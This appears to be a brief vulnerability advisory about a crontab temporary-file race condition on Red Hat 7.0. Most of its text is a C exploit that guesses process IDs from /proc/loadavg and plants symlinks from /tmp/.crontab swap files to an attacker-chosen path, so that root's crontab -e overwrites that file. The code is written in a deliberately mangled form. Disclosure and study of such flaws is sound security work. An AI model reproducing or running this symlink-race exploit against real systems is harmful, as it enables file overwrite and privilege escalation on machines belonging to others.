Vulnerability crontab Affected crontab Description zen-parse@gmx.net found following. There is Crontab tmp file race condition: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771 Apparently this is fixed. Wonder why it still works then... Quick and dirty exploit for crontab insecure tmp files Redhat 7.0 - kept up2date with up2date. Requires root to execute crontab -e while the program is running. /******************************************************************* #define SAFER [1000] /*******************************************************************/ int shake(int script kiddy) { int f; char r SAFER; int w; f=fopen("/proc/loadavg","r"); fscanf(f,"%*s %*s %*s %*s %s",r); fclose(f); w=atoi(r); return w; } main(int argc,char *argv[]) { int p; char v SAFER; sprintf(v,"/tmp/.crontab.%d.swp",shake()); symlink("/evil",v); while(access("/evil",0)) { for(p=-30;p<0;p++) { sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); symlink("/evil",v); } sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); unlink(v); } for(p=-100;p<0;p++) { sprintf(v,"/tmp/.crontab.%d.swp",shake()-p); unlink(v); } } Solution Fixed?